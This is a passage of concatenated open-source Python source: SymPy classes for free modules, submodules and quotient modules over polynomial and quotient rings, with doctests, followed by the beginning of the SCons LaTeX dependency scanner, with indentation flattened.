class FreeModuleQuotientRing(FreeModule):
"""
Free module over a quotient ring.
Do not instantiate this, use the constructor method of the ring instead:
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = (QQ.old_poly_ring(x)/[x**2 + 1]).free_module(3)
>>> F
(QQ[x]/<x**2 + 1>)**3
Attributes
- quot - the quotient module `R^n / IR^n`, where `R/I` is our ring
"""
def __init__(self, ring, rank):
from sympy.polys.domains.quotientring import QuotientRing
FreeModule.__init__(self, ring, rank)
if not isinstance(ring, QuotientRing):
raise NotImplementedError('This implementation only works over '
+ 'quotient rings, got %s' % ring)
F = self.ring.ring.free_module(self.rank)
self.quot = F / (self.ring.base_ideal*F)
def __repr__(self):
return "(" + repr(self.ring) + ")" + "**" + repr(self.rank)
def submodule(self, *gens, **opts):
"""
Generate a submodule.
>>> from sympy.abc import x, y
>>> from sympy import QQ
>>> M = (QQ.old_poly_ring(x, y)/[x**2 - y**2]).free_module(2).submodule([x, x + y])
>>> M
<[x + <x**2 - y**2>, x + y + <x**2 - y**2>]>
>>> M.contains([y**2, x**2 + x*y])
True
>>> M.contains([x, y])
False
"""
return SubModuleQuotientRing(gens, self, **opts)
def lift(self, elem):
"""
Lift the element ``elem`` of self to the module self.quot.
Note that self.quot is the same set as self, just as an R-module
and not as an R/I-module, so this makes sense.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = (QQ.old_poly_ring(x)/[x**2 + 1]).free_module(2)
>>> e = F.convert([1, 0])
>>> e
[1 + <x**2 + 1>, 0 + <x**2 + 1>]
>>> L = F.quot
>>> l = F.lift(e)
>>> l
[1, 0] + <[x**2 + 1, 0], [0, x**2 + 1]>
>>> L.contains(l)
True
"""
return self.quot.convert([x.data for x in elem])
def unlift(self, elem):
"""
Push down an element of self.quot to self.
This undoes ``lift``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = (QQ.old_poly_ring(x)/[x**2 + 1]).free_module(2)
>>> e = F.convert([1, 0])
>>> l = F.lift(e)
>>> e == l
False
>>> e == F.unlift(l)
True
"""
return self.convert(elem.data)
##########################################################################
## Submodules and subquotients ###########################################
##########################################################################
class SubModule(Module):
"""
Base class for submodules.
Attributes:
- container - containing module
- gens - generators (subset of containing module)
- rank - rank of containing module
Non-implemented methods:
- _contains
- _syzygies
- _in_terms_of_generators
- _intersect
- _module_quotient
Methods that likely need change in subclasses:
- reduce_element
"""
def __init__(self, gens, container):
Module.__init__(self, container.ring)
self.gens = tuple(container.convert(x) for x in gens)
self.container = container
self.rank = container.rank
self.ring = container.ring
self.dtype = container.dtype
def __repr__(self):
return "<" + ", ".join(repr(x) for x in self.gens) + ">"
def _contains(self, other):
"""Implementation of containment.
Other is guaranteed to be FreeModuleElement."""
raise NotImplementedError
def _syzygies(self):
"""Implementation of syzygy computation wrt self generators."""
raise NotImplementedError
def _in_terms_of_generators(self, e):
"""Implementation of expression in terms of generators."""
raise NotImplementedError
def convert(self, elem, M=None):
"""
Convert ``elem`` into the internal represantition.
Mostly called implicitly.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> M = QQ.old_poly_ring(x).free_module(2).submodule([1, x])
>>> M.convert([2, 2*x])
[2, 2*x]
"""
if isinstance(elem, self.container.dtype) and elem.module is self:
return elem
r = copy(self.container.convert(elem, M))
r.module = self
if not self._contains(r):
raise CoercionFailed
return r
def _intersect(self, other):
"""Implementation of intersection.
Other is guaranteed to be a submodule of same free module."""
raise NotImplementedError
def _module_quotient(self, other):
"""Implementation of quotient.
Other is guaranteed to be a submodule of same free module."""
raise NotImplementedError
def intersect(self, other, **options):
"""
Returns the intersection of ``self`` with submodule ``other``.
>>> from sympy.abc import x, y
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x, y).free_module(2)
>>> F.submodule([x, x]).intersect(F.submodule([y, y]))
<[x*y, x*y]>
Some implementation allow further options to be passed. Currently, to
only one implemented is ``relations=True``, in which case the function
will return a triple ``(res, rela, relb)``, where ``res`` is the
intersection module, and ``rela`` and ``relb`` are lists of coefficient
vectors, expressing the generators of ``res`` in terms of the
generators of ``self`` (``rela``) and ``other`` (``relb``).
>>> F.submodule([x, x]).intersect(F.submodule([y, y]), relations=True)
(<[x*y, x*y]>, [(y,)], [(x,)])
The above result says: the intersection module is generated by the
single element `(-xy, -xy) = -y (x, x) = -x (y, y)`, where
`(x, x)` and `(y, y)` respectively are the unique generators of
the two modules being intersected.
"""
if not isinstance(other, SubModule):
raise TypeError('%s is not a SubModule' % other)
if other.container != self.container:
raise ValueError(
'%s is contained in a different free module' % other)
return self._intersect(other, **options)
def module_quotient(self, other, **options):
r"""
Returns the module quotient of ``self`` by submodule ``other``.
That is, if ``self`` is the module `M` and ``other`` is `N`, then
return the ideal `\{f \in R | fN \subset M\}`.
>>> from sympy import QQ
>>> from sympy.abc import x, y
>>> F = QQ.old_poly_ring(x, y).free_module(2)
>>> S = F.submodule([x*y, x*y])
>>> T = F.submodule([x, x])
>>> S.module_quotient(T)
<y>
Some implementations allow further options to be passed. Currently, the
only one implemented is ``relations=True``, which may only be passed
if ``other`` is prinicipal. In this case the function
will return a pair ``(res, rel)`` where ``res`` is the ideal, and
``rel`` is a list of coefficient vectors, expressing the generators of
the ideal, multiplied by the generator of ``other`` in terms of
generators of ``self``.
>>> S.module_quotient(T, relations=True)
(<y>, [[1]])
This means that the quotient ideal is generated by the single element
`y`, and that `y (x, x) = 1 (xy, xy)`, `(x, x)` and `(xy, xy)` being
the generators of `T` and `S`, respectively.
"""
if not isinstance(other, SubModule):
raise TypeError('%s is not a SubModule' % other)
if other.container != self.container:
raise ValueError(
'%s is contained in a different free module' % other)
return self._module_quotient(other, **options)
def union(self, other):
"""
Returns the module generated by the union of ``self`` and ``other``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(1)
>>> M = F.submodule([x**2 + x]) # <x(x+1)>
>>> N = F.submodule([x**2 - 1]) # <(x-1)(x+1)>
>>> M.union(N) == F.submodule([x+1])
True
"""
if not isinstance(other, SubModule):
raise TypeError('%s is not a SubModule' % other)
if other.container != self.container:
raise ValueError(
'%s is contained in a different free module' % other)
return self.__class__(self.gens + other.gens, self.container)
def is_zero(self):
"""
Return True if ``self`` is a zero module.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(2)
>>> F.submodule([x, 1]).is_zero()
False
>>> F.submodule([0, 0]).is_zero()
True
"""
return all(x == 0 for x in self.gens)
def submodule(self, *gens):
"""
Generate a submodule.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> M = QQ.old_poly_ring(x).free_module(2).submodule([x, 1])
>>> M.submodule([x**2, x])
<[x**2, x]>
"""
if not self.subset(gens):
raise ValueError('%s not a subset of %s' % (gens, self))
return self.__class__(gens, self.container)
def is_full_module(self):
"""
Return True if ``self`` is the entire free module.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(2)
>>> F.submodule([x, 1]).is_full_module()
False
>>> F.submodule([1, 1], [1, 2]).is_full_module()
True
"""
return all(self.contains(x) for x in self.container.basis())
def is_submodule(self, other):
"""
Returns True if ``other`` is a submodule of ``self``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(2)
>>> M = F.submodule([2, x])
>>> N = M.submodule([2*x, x**2])
>>> M.is_submodule(M)
True
>>> M.is_submodule(N)
True
>>> N.is_submodule(M)
False
"""
if isinstance(other, SubModule):
return self.container == other.container and \
all(self.contains(x) for x in other.gens)
if isinstance(other, (FreeModule, QuotientModule)):
return self.container == other and self.is_full_module()
return False
def syzygy_module(self, **opts):
r"""
Compute the syzygy module of the generators of ``self``.
Suppose `M` is generated by `f_1, \dots, f_n` over the ring
`R`. Consider the homomorphism `\phi: R^n \to M`, given by
sending `(r_1, \dots, r_n) \to r_1 f_1 + \dots + r_n f_n`.
The syzygy module is defined to be the kernel of `\phi`.
The syzygy module is zero iff the generators generate freely a free
submodule:
>>> from sympy.abc import x, y
>>> from sympy import QQ
>>> QQ.old_poly_ring(x).free_module(2).submodule([1, 0], [1, 1]).syzygy_module().is_zero()
True
A slightly more interesting example:
>>> M = QQ.old_poly_ring(x, y).free_module(2).submodule([x, 2*x], [y, 2*y])
>>> S = QQ.old_poly_ring(x, y).free_module(2).submodule([y, -x])
>>> M.syzygy_module() == S
True
"""
F = self.ring.free_module(len(self.gens))
# NOTE we filter out zero syzygies. This is for convenience of the
# _syzygies function and not meant to replace any real "generating set
# reduction" algorithm
return F.submodule(*[x for x in self._syzygies() if F.convert(x) != 0],
**opts)
def in_terms_of_generators(self, e):
"""
Express element ``e`` of ``self`` in terms of the generators.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(2)
>>> M = F.submodule([1, 0], [1, 1])
>>> M.in_terms_of_generators([x, x**2])
[-x**2 + x, x**2]
"""
try:
e = self.convert(e)
except CoercionFailed:
raise ValueError('%s is not an element of %s' % (e, self))
return self._in_terms_of_generators(e)
def reduce_element(self, x):
"""
Reduce the element ``x`` of our ring modulo the ideal ``self``.
Here "reduce" has no specific meaning, it could return a unique normal
form, simplify the expression a bit, or just do nothing.
"""
return x
def quotient_module(self, other, **opts):
"""
Return a quotient module.
This is the same as taking a submodule of a quotient of the containing
module.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(2)
>>> S1 = F.submodule([x, 1])
>>> S2 = F.submodule([x**2, x])
>>> S1.quotient_module(S2)
<[x, 1] + <[x**2, x]>>
Or more coincisely, using the overloaded division operator:
>>> F.submodule([x, 1]) / [(x**2, x)]
<[x, 1] + <[x**2, x]>>
"""
if not self.is_submodule(other):
raise ValueError('%s not a submodule of %s' % (other, self))
return SubQuotientModule(self.gens,
self.container.quotient_module(other), **opts)
def __add__(self, oth):
return self.container.quotient_module(self).convert(oth)
__radd__ = __add__
def multiply_ideal(self, I):
"""
Multiply ``self`` by the ideal ``I``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> I = QQ.old_poly_ring(x).ideal(x**2)
>>> M = QQ.old_poly_ring(x).free_module(2).submodule([1, 1])
>>> I*M
<[x**2, x**2]>
"""
return self.submodule(*[x*g for [x] in I._module.gens for g in self.gens])
def inclusion_hom(self):
"""
Return a homomorphism representing the inclusion map of ``self``.
That is, the natural map from ``self`` to ``self.container``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> QQ.old_poly_ring(x).free_module(2).submodule([x, x]).inclusion_hom()
Matrix([
[1, 0], : <[x, x]> -> QQ[x]**2
[0, 1]])
"""
return self.container.identity_hom().restrict_domain(self)
def identity_hom(self):
"""
Return the identity homomorphism on ``self``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> QQ.old_poly_ring(x).free_module(2).submodule([x, x]).identity_hom()
Matrix([
[1, 0], : <[x, x]> -> <[x, x]>
[0, 1]])
"""
return self.container.identity_hom().restrict_domain(
self).restrict_codomain(self)
class SubQuotientModule(SubModule):
"""
Submodule of a quotient module.
Equivalently, quotient module of a submodule.
Do not instantiate this, instead use the submodule or quotient_module
constructing methods:
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(2)
>>> S = F.submodule([1, 0], [1, x])
>>> Q = F/[(1, 0)]
>>> S/[(1, 0)] == Q.submodule([5, x])
True
Attributes:
- base - base module we are quotient of
- killed_module - submodule used to form the quotient
"""
def __init__(self, gens, container, **opts):
SubModule.__init__(self, gens, container)
self.killed_module = self.container.killed_module
# XXX it is important for some code below that the generators of base
# are in this particular order!
self.base = self.container.base.submodule(
*[x.data for x in self.gens], **opts).union(self.killed_module)
def _contains(self, elem):
return self.base.contains(elem.data)
def _syzygies(self):
# let N = self.killed_module be generated by e_1, ..., e_r
# let F = self.base be generated by f_1, ..., f_s and e_1, ..., e_r
# Then self = F/N.
# Let phi: R**s --> self be the evident surjection.
# Similarly psi: R**(s + r) --> F.
# We need to find generators for ker(phi). Let chi: R**s --> F be the
# evident lift of phi. For X in R**s, phi(X) = 0 iff chi(X) is
# contained in N, iff there exists Y in R**r such that
# psi(X, Y) = 0.
# Hence if alpha: R**(s + r) --> R**s is the projection map, then
# ker(phi) = alpha ker(psi).
return [X[:len(self.gens)] for X in self.base._syzygies()]
def _in_terms_of_generators(self, e):
return self.base._in_terms_of_generators(e.data)[:len(self.gens)]
def is_full_module(self):
"""
Return True if ``self`` is the entire free module.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(2)
>>> F.submodule([x, 1]).is_full_module()
False
>>> F.submodule([1, 1], [1, 2]).is_full_module()
True
"""
return self.base.is_full_module()
def quotient_hom(self):
"""
Return the quotient homomorphism to self.
That is, return the natural map from ``self.base`` to ``self``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> M = (QQ.old_poly_ring(x).free_module(2) / [(1, x)]).submodule([1, 0])
>>> M.quotient_hom()
Matrix([
[1, 0], : <[1, 0], [1, x]> -> <[1, 0] + <[1, x]>, [1, x] + <[1, x]>>
[0, 1]])
"""
return self.base.identity_hom().quotient_codomain(self.killed_module)
_subs0 = lambda x: x[0]
_subs1 = lambda x: x[1:]
class ModuleOrder(ProductOrder):
"""A product monomial order with a zeroth term as module index."""
def __init__(self, o1, o2, TOP):
if TOP:
ProductOrder.__init__(self, (o2, _subs1), (o1, _subs0))
else:
ProductOrder.__init__(self, (o1, _subs0), (o2, _subs1))
class SubModulePolyRing(SubModule):
"""
Submodule of a free module over a generalized polynomial ring.
Do not instantiate this, use the constructor method of FreeModule instead:
>>> from sympy.abc import x, y
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x, y).free_module(2)
>>> F.submodule([x, y], [1, 0])
<[x, y], [1, 0]>
Attributes:
- order - monomial order used
"""
#self._gb - cached groebner basis
#self._gbe - cached groebner basis relations
def __init__(self, gens, container, order="lex", TOP=True):
SubModule.__init__(self, gens, container)
if not isinstance(container, FreeModulePolyRing):
raise NotImplementedError('This implementation is for submodules of '
+ 'FreeModulePolyRing, got %s' % container)
self.order = ModuleOrder(monomial_key(order), self.ring.order, TOP)
self._gb = None
self._gbe = None
def __eq__(self, other):
if isinstance(other, SubModulePolyRing) and self.order != other.order:
return False
return SubModule.__eq__(self, other)
def _groebner(self, extended=False):
"""Returns a standard basis in sdm form."""
from sympy.polys.distributedmodules import sdm_groebner, sdm_nf_mora
if self._gbe is None and extended:
gb, gbe = sdm_groebner(
[self.ring._vector_to_sdm(x, self.order) for x in self.gens],
sdm_nf_mora, self.order, self.ring.dom, extended=True)
self._gb, self._gbe = tuple(gb), tuple(gbe)
if self._gb is None:
self._gb = tuple(sdm_groebner(
[self.ring._vector_to_sdm(x, self.order) for x in self.gens],
sdm_nf_mora, self.order, self.ring.dom))
if extended:
return self._gb, self._gbe
else:
return self._gb
def _groebner_vec(self, extended=False):
"""Returns a standard basis in element form."""
if not extended:
return [self.convert(self.ring._sdm_to_vector(x, self.rank))
for x in self._groebner()]
gb, gbe = self._groebner(extended=True)
return ([self.convert(self.ring._sdm_to_vector(x, self.rank))
for x in gb],
[self.ring._sdm_to_vector(x, len(self.gens)) for x in gbe])
def _contains(self, x):
from sympy.polys.distributedmodules import sdm_zero, sdm_nf_mora
return sdm_nf_mora(self.ring._vector_to_sdm(x, self.order),
self._groebner(), self.order, self.ring.dom) == \
sdm_zero()
def _syzygies(self):
"""Compute syzygies. See [SCA, algorithm 2.5.4]."""
# NOTE if self.gens is a standard basis, this can be done more
# efficiently using Schreyer's theorem
from sympy.matrices import eye
# First bullet point
k = len(self.gens)
r = self.rank
im = eye(k)
Rkr = self.ring.free_module(r + k)
newgens = []
for j, f in enumerate(self.gens):
m = [0]*(r + k)
for i, v in enumerate(f):
m[i] = f[i]
for i in range(k):
m[r + i] = im[j, i]
newgens.append(Rkr.convert(m))
# Note: we need *descending* order on module index, and TOP=False to
# get an eliminetaion order
F = Rkr.submodule(*newgens, order='ilex', TOP=False)
# Second bullet point: standard basis of F
G = F._groebner_vec()
# Third bullet point: G0 = G intersect the new k components
G0 = [x[r:] for x in G if all(y == self.ring.convert(0)
for y in x[:r])]
# Fourth and fifth bullet points: we are done
return G0
def _in_terms_of_generators(self, e):
"""Expression in terms of generators. See [SCA, 2.8.1]."""
# NOTE: if gens is a standard basis, this can be done more efficiently
M = self.ring.free_module(self.rank).submodule(*((e,) + self.gens))
S = M.syzygy_module(
order="ilex", TOP=False) # We want decreasing order!
G = S._groebner_vec()
# This list cannot not be empty since e is an element
e = [x for x in G if self.ring.is_unit(x[0])][0]
return [-x/e[0] for x in e[1:]]
def reduce_element(self, x, NF=None):
"""
Reduce the element ``x`` of our container modulo ``self``.
This applies the normal form ``NF`` to ``x``. If ``NF`` is passed
as none, the default Mora normal form is used (which is not unique!).
"""
from sympy.polys.distributedmodules import sdm_nf_mora
if NF is None:
NF = sdm_nf_mora
return self.container.convert(self.ring._sdm_to_vector(NF(
self.ring._vector_to_sdm(x, self.order), self._groebner(),
self.order, self.ring.dom),
self.rank))
def _intersect(self, other, relations=False):
# See: [SCA, section 2.8.2]
fi = self.gens
hi = other.gens
r = self.rank
ci = [[0]*(2*r) for _ in range(r)]
for k in range(r):
ci[k][k] = 1
ci[k][r + k] = 1
di = [list(f) + [0]*r for f in fi]
ei = [[0]*r + list(h) for h in hi]
syz = self.ring.free_module(2*r).submodule(*(ci + di + ei))._syzygies()
nonzero = [x for x in syz if any(y != self.ring.zero for y in x[:r])]
res = self.container.submodule(*([-y for y in x[:r]] for x in nonzero))
reln1 = [x[r:r + len(fi)] for x in nonzero]
reln2 = [x[r + len(fi):] for x in nonzero]
if relations:
return res, reln1, reln2
return res
def _module_quotient(self, other, relations=False):
# See: [SCA, section 2.8.4]
if relations and len(other.gens) != 1:
raise NotImplementedError
if len(other.gens) == 0:
return self.ring.ideal(1)
elif len(other.gens) == 1:
# We do some trickery. Let f be the (vector!) generating ``other``
# and f1, .., fn be the (vectors) generating self.
# Consider the submodule of R^{r+1} generated by (f, 1) and
# {(fi, 0) | i}. Then the intersection with the last module
# component yields the quotient.
g1 = list(other.gens[0]) + [1]
gi = [list(x) + [0] for x in self.gens]
# NOTE: We *need* to use an elimination order
M = self.ring.free_module(self.rank + 1).submodule(*([g1] + gi),
order='ilex', TOP=False)
if not relations:
return self.ring.ideal(*[x[-1] for x in M._groebner_vec() if
all(y == self.ring.zero for y in x[:-1])])
else:
G, R = M._groebner_vec(extended=True)
indices = [i for i, x in enumerate(G) if
all(y == self.ring.zero for y in x[:-1])]
return (self.ring.ideal(*[G[i][-1] for i in indices]),
[[-x for x in R[i][1:]] for i in indices])
# For more generators, we use I : <h1, .., hn> = intersection of
# {I : <hi> | i}
# TODO this can be done more efficiently
return reduce(lambda x, y: x.intersect(y),
(self._module_quotient(self.container.submodule(x)) for x in other.gens))
class SubModuleQuotientRing(SubModule):
"""
Class for submodules of free modules over quotient rings.
Do not instantiate this. Instead use the submodule methods.
>>> from sympy.abc import x, y
>>> from sympy import QQ
>>> M = (QQ.old_poly_ring(x, y)/[x**2 - y**2]).free_module(2).submodule([x, x + y])
>>> M
<[x + <x**2 - y**2>, x + y + <x**2 - y**2>]>
>>> M.contains([y**2, x**2 + x*y])
True
>>> M.contains([x, y])
False
Attributes:
- quot - the subquotient of `R^n/IR^n` generated by lifts of our generators
"""
def __init__(self, gens, container):
SubModule.__init__(self, gens, container)
self.quot = self.container.quot.submodule(
*[self.container.lift(x) for x in self.gens])
def _contains(self, elem):
return self.quot._contains(self.container.lift(elem))
def _syzygies(self):
return [tuple(self.ring.convert(y, self.quot.ring) for y in x)
for x in self.quot._syzygies()]
def _in_terms_of_generators(self, elem):
return [self.ring.convert(x, self.quot.ring) for x in
self.quot._in_terms_of_generators(self.container.lift(elem))]
##########################################################################
## Quotient Modules ######################################################
##########################################################################
class QuotientModuleElement(ModuleElement):
"""Element of a quotient module."""
def eq(self, d1, d2):
"""Equality comparison."""
return self.module.killed_module.contains(d1 - d2)
def __repr__(self):
return repr(self.data) + " + " + repr(self.module.killed_module)
class QuotientModule(Module):
"""
Class for quotient modules.
Do not instantiate this directly. For subquotients, see the
SubQuotientModule class.
Attributes:
- base - the base module we are a quotient of
- killed_module - the submodule used to form the quotient
- rank of the base
"""
dtype = QuotientModuleElement
def __init__(self, ring, base, submodule):
Module.__init__(self, ring)
if not base.is_submodule(submodule):
raise ValueError('%s is not a submodule of %s' % (submodule, base))
self.base = base
self.killed_module = submodule
self.rank = base.rank
def __repr__(self):
return repr(self.base) + "/" + repr(self.killed_module)
def is_zero(self):
"""
Return True if ``self`` is a zero module.
This happens if and only if the base module is the same as the
submodule being killed.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(2)
>>> (F/[(1, 0)]).is_zero()
False
>>> (F/[(1, 0), (0, 1)]).is_zero()
True
"""
return self.base == self.killed_module
def is_submodule(self, other):
"""
Return True if ``other`` is a submodule of ``self``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> Q = QQ.old_poly_ring(x).free_module(2) / [(x, x)]
>>> S = Q.submodule([1, 0])
>>> Q.is_submodule(S)
True
>>> S.is_submodule(Q)
False
"""
if isinstance(other, QuotientModule):
return self.killed_module == other.killed_module and \
self.base.is_submodule(other.base)
if isinstance(other, SubQuotientModule):
return other.container == self
return False
def submodule(self, *gens, **opts):
"""
Generate a submodule.
This is the same as taking a quotient of a submodule of the base
module.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> Q = QQ.old_poly_ring(x).free_module(2) / [(x, x)]
>>> Q.submodule([x, 0])
<[x, 0] + <[x, x]>>
"""
return SubQuotientModule(gens, self, **opts)
def convert(self, elem, M=None):
"""
Convert ``elem`` into the internal representation.
This method is called implicitly whenever computations involve elements
not in the internal representation.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> F = QQ.old_poly_ring(x).free_module(2) / [(1, 2), (1, x)]
>>> F.convert([1, 0])
[1, 0] + <[1, 2], [1, x]>
"""
if isinstance(elem, QuotientModuleElement):
if elem.module is self:
return elem
if self.killed_module.is_submodule(elem.module.killed_module):
return QuotientModuleElement(self, self.base.convert(elem.data))
raise CoercionFailed
return QuotientModuleElement(self, self.base.convert(elem))
def identity_hom(self):
"""
Return the identity homomorphism on ``self``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> M = QQ.old_poly_ring(x).free_module(2) / [(1, 2), (1, x)]
>>> M.identity_hom()
Matrix([
[1, 0], : QQ[x]**2/<[1, 2], [1, x]> -> QQ[x]**2/<[1, 2], [1, x]>
[0, 1]])
"""
return self.base.identity_hom().quotient_codomain(
self.killed_module).quotient_domain(self.killed_module)
def quotient_hom(self):
"""
Return the quotient homomorphism to ``self``.
That is, return a homomorphism representing the natural map from
``self.base`` to ``self``.
>>> from sympy.abc import x
>>> from sympy import QQ
>>> M = QQ.old_poly_ring(x).free_module(2) / [(1, 2), (1, x)]
>>> M.quotient_hom()
Matrix([
[1, 0], : QQ[x]**2 -> QQ[x]**2/<[1, 2], [1, x]>
[0, 1]])
"""
return self.base.identity_hom().quotient_codomain(
self.killed_module)
| bsd-3-clause |
smart-make/zxing | cpp/scons/scons-local-2.0.0.final.0/SCons/Scanner/LaTeX.py | 34 | 15021 | """SCons.Scanner.LaTeX
This module implements the dependency scanner for LaTeX code.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Scanner/LaTeX.py 5023 2010/06/14 22:05:46 scons"
import os.path
import re
import SCons.Scanner
import SCons.Util
# list of graphics file extensions for TeX and LaTeX
TexGraphics = ['.eps', '.ps']
LatexGraphics = ['.pdf', '.png', '.jpg', '.gif', '.tif']
# Used as a return value of modify_env_var if the variable is not set.
class _Null(object):
pass
_null = _Null
# The user specifies the paths in env[variable], similar to other builders.
# They may be relative and must be converted to absolute, as expected
# by LaTeX and Co. The environment may already have some paths in
# env['ENV'][var]. These paths are honored, but the env[var] paths have
# higher precedence. All changes are un-done on exit.
def modify_env_var(env, var, abspath):
try:
save = env['ENV'][var]
except KeyError:
save = _null
env.PrependENVPath(var, abspath)
try:
if SCons.Util.is_List(env[var]):
env.PrependENVPath(var, [os.path.abspath(str(p)) for p in env[var]])
else:
# Split at os.pathsep to convert into absolute path
env.PrependENVPath(var, [os.path.abspath(p) for p in str(env[var]).split(os.pathsep)])
except KeyError:
pass
# Convert into a string explicitly to append ":" (without which it won't search system
# paths as well). The problem is that env.AppendENVPath(var, ":")
# does not work, refuses to append ":" (os.pathsep).
if SCons.Util.is_List(env['ENV'][var]):
env['ENV'][var] = os.pathsep.join(env['ENV'][var])
# Append the trailing os.pathsep character here to catch the case with no env[var]
env['ENV'][var] = env['ENV'][var] + os.pathsep
return save
class FindENVPathDirs(object):
"""A class to bind a specific *PATH variable name to a function that
will return all of the *path directories."""
def __init__(self, variable):
self.variable = variable
def __call__(self, env, dir=None, target=None, source=None, argument=None):
import SCons.PathList
try:
path = env['ENV'][self.variable]
except KeyError:
return ()
dir = dir or env.fs._cwd
path = SCons.PathList.PathList(path).subst_path(env, target, source)
return tuple(dir.Rfindalldirs(path))
def LaTeXScanner():
"""Return a prototype Scanner instance for scanning LaTeX source files
when built with latex.
"""
ds = LaTeX(name = "LaTeXScanner",
suffixes = '$LATEXSUFFIXES',
# in the search order, see below in LaTeX class docstring
graphics_extensions = TexGraphics,
recursive = 0)
return ds
def PDFLaTeXScanner():
"""Return a prototype Scanner instance for scanning LaTeX source files
when built with pdflatex.
"""
ds = LaTeX(name = "PDFLaTeXScanner",
suffixes = '$LATEXSUFFIXES',
# in the search order, see below in LaTeX class docstring
graphics_extensions = LatexGraphics,
recursive = 0)
return ds
class LaTeX(SCons.Scanner.Base):
"""Class for scanning LaTeX files for included files.
Unlike most scanners, which use regular expressions that just
return the included file name, this returns a tuple consisting
of the keyword for the inclusion ("include", "includegraphics",
"input", or "bibliography"), and then the file name itself.
Based on a quick look at LaTeX documentation, it seems that we
should append .tex suffix for the "include" keywords, append .tex if
there is no extension for the "input" keyword, and need to add .bib
for the "bibliography" keyword that does not accept extensions by itself.
Finally, if there is no extension for an "includegraphics" keyword
latex will append .ps or .eps to find the file, while pdftex may use .pdf,
.jpg, .tif, .mps, or .png.
The actual subset and search order may be altered by
DeclareGraphicsExtensions command. This complication is ignored.
The default order corresponds to experimentation with teTeX
$ latex --version
pdfeTeX 3.141592-1.21a-2.2 (Web2C 7.5.4)
kpathsea version 3.5.4
The order is:
['.eps', '.ps'] for latex
['.png', '.pdf', '.jpg', '.tif'].
Another difference is that the search path is determined by the type
of the file being searched:
env['TEXINPUTS'] for "input" and "include" keywords
env['TEXINPUTS'] for "includegraphics" keyword
env['TEXINPUTS'] for "lstinputlisting" keyword
env['BIBINPUTS'] for "bibliography" keyword
env['BSTINPUTS'] for "bibliographystyle" keyword
FIXME: also look for the class or style in document[class|style]{}
FIXME: also look for the argument of bibliographystyle{}
"""
keyword_paths = {'include': 'TEXINPUTS',
'input': 'TEXINPUTS',
'includegraphics': 'TEXINPUTS',
'bibliography': 'BIBINPUTS',
'bibliographystyle': 'BSTINPUTS',
'usepackage': 'TEXINPUTS',
'lstinputlisting': 'TEXINPUTS'}
env_variables = SCons.Util.unique(list(keyword_paths.values()))
def __init__(self, name, suffixes, graphics_extensions, *args, **kw):
# We have to include \n with the % we exclude from the first part
# part of the regex because the expression is compiled with re.M.
# Without the \n, the ^ could match the beginning of a *previous*
# line followed by one or more newline characters (i.e. blank
# lines), interfering with a match on the next line.
regex = r'^[^%\n]*\\(include|includegraphics(?:\[[^\]]+\])?|lstinputlisting(?:\[[^\]]+\])?|input|bibliography|usepackage){([^}]*)}'
self.cre = re.compile(regex, re.M)
self.graphics_extensions = graphics_extensions
def _scan(node, env, path=(), self=self):
node = node.rfile()
if not node.exists():
return []
return self.scan_recurse(node, path)
class FindMultiPathDirs(object):
"""The stock FindPathDirs function has the wrong granularity:
it is called once per target, while we need the path that depends
on what kind of included files is being searched. This wrapper
hides multiple instances of FindPathDirs, one per the LaTeX path
variable in the environment. When invoked, the function calculates
and returns all the required paths as a dictionary (converted into
a tuple to become hashable). Then the scan function converts it
back and uses a dictionary of tuples rather than a single tuple
of paths.
"""
def __init__(self, dictionary):
self.dictionary = {}
for k,n in dictionary.items():
self.dictionary[k] = ( SCons.Scanner.FindPathDirs(n),
FindENVPathDirs(n) )
def __call__(self, env, dir=None, target=None, source=None,
argument=None):
di = {}
for k,(c,cENV) in self.dictionary.items():
di[k] = ( c(env, dir=None, target=None, source=None,
argument=None) ,
cENV(env, dir=None, target=None, source=None,
argument=None) )
